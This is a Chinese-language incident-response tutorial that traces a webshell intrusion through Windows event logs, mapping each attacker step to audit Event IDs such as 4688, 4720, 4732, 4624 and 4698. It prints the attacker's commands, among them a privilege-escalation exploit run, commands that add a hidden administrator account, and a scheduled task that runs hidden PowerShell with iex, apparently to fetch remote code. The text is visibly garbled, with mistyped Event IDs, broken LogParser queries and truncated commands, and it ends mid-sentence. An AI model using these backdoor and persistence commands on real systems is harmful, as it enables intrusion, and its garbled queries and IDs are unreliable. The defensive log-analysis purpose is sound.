某合作伙伴发现,对互联网上大多数windows系统日志的分析只是对恶意登录事件的分析,能否从系统日志中找到其他入侵痕迹?
答案确实是可能的。 攻击者获取webshell时,会以各种方式执行系统命令。 所有web攻击行为都保留在web访问日志中,执行操作系统命令的行为也存在于系统日志中。 不同的攻击场景会生成不同的系统日志,不同的Event ID表示不同的含义。 需要重点关注一些事件ID,分析入侵者在系统上留下的攻击痕迹。
通过一个攻击案例进行windows日志分析,从日志中识别攻击场景,发现恶意软件的运行痕迹,恢复攻击者的行为轨迹。1、信息收集
攻击者获取webshell权限后,会尝试查询当前用户权限,并收集系统版本和修补程序信息以帮助提高权限。
whoami系统信息windows日志分析:
本地安全策略要求打开审核流程跟踪,以跟踪流程的创建/终止。 关键流程跟踪事件和说明,包括:
488创建新进程4689进程已结束
在LogParser中进行了简单的过滤,获得了Event ID 4688。 这意味着,创建新进程的列表后,您会看到用户Bypass正在调用cmd运行whami和系统信息。 Conhost.exe进程主要为命令行程序(cmd.exe )提供图形子系统等功能支持。
log parser.exeI : evto : datagrid ' select * fromc : (11.evtx ' log parser.exe-I 3: evt ' selecttimegenerer '|' ) asprocessnamefromc : (11.evtxwhereeventid=4688 () ) ) )。
2、权限提升
通过运行exp提高权限,获取操作系统的system权限,并增加管理用户。
ms16-032.exe ' whoami ' ms16-032.exe ' net usertest 1abc 123!/add ' ms16-032.exe ' netlocalgroupadministratorstest1/add ' windows日志分析:
本地安全策略要求打开审核帐户管理、关键帐户管理事件和说明。 例如:
创建420个用户已将成员添加到启用了4732安全的本地组
这里涉及到流程的创建,主要关注帐户的创建和用户组变更的管理。 从Event ID 4720开始,在系统中设立了新的test用户,从Event ID 4732的两条记录的变更中获得了重要信息,本地用户的test从user组升级为管理员。
3、管理账号登录
创建管理帐户后,尝试远程登录到目标主机以获取敏感信息。
mstsc /v 10.1.1.188 Windows日志分析:
本地安全策略要求打开审核登录事件、重要登录事件和说明,例如:
4624登录成功4625登录失败
log parser.exe-I : evt ' selecttimegeneratedaslogintime,extract_token(strings,8,'|' ) as EventType,extract
使用LogParser进行分析,获得系统登录时间,登录类型10,即远程登录,登录用户test,登录IP:10.1.1.1。
4、权限维持
通过为计划任务执行脚本创建后门,以便下次可以直接访问,可以使用以下命令一键完成:
sh tasks/create/sc minute/mo1/TN ' security script '/tr ' powershell.exe-nop-w hidden-c' iex (' 335810.1 )
本地安全策略要求打开审计对象访问、关键对象访问事件,例如:
创建4698计划任务删除4699计划任务
本节介绍了进程创建和对象访问事件,包括创建schtasks.exe进程以及使用Event ID 4698检测新的计划任务。 找到计划任务后门的位置: